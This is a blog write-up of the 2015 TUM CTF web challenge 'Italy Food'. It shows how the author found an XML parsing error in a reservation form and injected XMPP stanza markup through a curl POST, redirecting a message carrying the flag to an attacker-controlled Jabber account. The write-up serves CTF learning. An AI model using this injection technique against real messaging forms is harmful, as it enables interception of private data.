Sunday, October 25, 2015

TUM CTF 2015 - Italy Food (200)





This was a new CTF coming from H4x0rPsch0rr team representing Technische Universität München.
The point system seemed a little off, but overall I had fun with these challenges!

On this one, I primarily targeted higher point challenges in Misc & Web.

"Italy Food" was a challenge about exploiting a restaurant's website.
It was solved very quickly by another team early on in the game, but then through-out the day, no one else could figure it out until later.  It turns out it wasn't the most difficult to solve, but interesting to go through.


URL: http://1.ctf.link:1120
Description:
Organizing a CTF makes hungry... anyone in for pizza?
Get it while it's hot, hawt, HAWT!!!

1.ctf.link:1120


First started by looking at the sources tab in Google Chrome's Dev Tools.  There were some custom CSS files, font-awesome, vendor css, vendor javascript, and some very simple js logic for controlling the header menu  (Probably part of the Theme).

If you notice above the "Reservation" tab is the darkest color.  I hadn't seen this at first, but it's fairly obvious this was the target.  Also noticed during the challenge, no other pages had any obvious input areas which could potentially be abused.




On this form we have a very clear message telling us how this works.

With our patent pending XMPP reservation 
messaging system, our manager will be 
instantly notified and will respond near 
instantly. Our system will send your 
reservation FLAG right to him!

So the main points here are:

  • XMPP (Protocol being used)
  • Manager will be notified of this message  (Some Jabber Acct.)
  • sending the reservation FLAG (Payload is loaded with FLAG already)


The first thing I try with any Web challenge is to see what type of filters may not be setup.  The first thing I tried seemed to work, I filled out each entry with reasonable values except the "Message" section.  That section was where I put:

abcd
<br>
etc

This returned with an Error!  Looks like we're onto something!

Fatal error: Uncaught exception 'Fabiang\Xmpp\Exception\XMLParserException' with message 'XML parsing error: "Mismatched tag" at Line 5 at column 63' in /var/www/html/vendor/fabiang/xmpp/src/Exception/XMLParserException.php:68 Stack trace: #0 

/var/www/html/vendor/fabiang/xmpp/src/Stream/XMLStream.php(160): Fabiang\Xmpp\Exception\XMLParserException::create(Resource id #13) #1 

/var/www/html/vendor/fabiang/xmpp/src/Connection/Socket.php(162): Fabiang\Xmpp\Stream\XMLStream->parse('send(Object(ProxyStanza)) #4 {main} thrown in 

/var/www/html/vendor/fabiang/xmpp/src/Exception/XMLParserException.php on line 68


It looks like we've got an XML parsing error.  It also looks like they're using a 3rd party php module called "xmpp" by fabiang (found here - https://github.com/fabiang/xmpp)

After looking into this repository, I found where it was failing.  But I was more interested in how to exploit this failure.  Maybe the xmpp repo can shed some light of how the XML is structured in the request.

Searching through the repo, it was very well tested, which means there are also more examples to look at.  The one that helped the most was under Protocol tests for Messages - https://github.com/fabiang/xmpp/blob/master/tests/src/Protocol/MessageTest.php#L83

public function testToString()
{
    $this->object->setTo('foobar')->setMessage('testmessage');
    $this->assertRegExp(
        '#<message type="chat" id="fabiang_xmpp_[^"]+" to="foobar"><body>testmessage</body></message>#',
        $this->object->toString()
    );
}



So let's break this down quickly....

We have a very simple structure for the message:

<message type="chat" id="some_id" to="jabber_id"><body>CONTENT</body></message>

Now we know the flag is being sent to the Manager, and we want the flag... so why don't we just send it to ourselves?  We'll need to change the "to" attribute for this to work.

We'll also assume that the form being submitted from the restaurant's reservation page is being inserted into the body of the message.


Let's also use an easier way of testing each attempt (Some bare minimum essentials for the POST request):

curl -XPOST 'http://1.ctf.link:1120/reservation.php' --data 'name=test&message=<br>'

Now let's construct our target payload for the submission.

First we need to end the body & message tags:

</body></message>

Then we need our newly constructed message and body tags targeting our own temporary XMPP Jabber account:

<message to="attacker@jabb3r.de"><body>


The whole thing together:

curl -XPOST 'http://1.ctf.link:1120/reservation.php' --data 'name=attacker: &message=</body></message><message to="attacker@jabb3r.de"><body>'

Now back on our XMPP Client signed into the attacker account, we've got the resulting Flag!


hxp{we_need_a_xep_for_fastfood_ordering}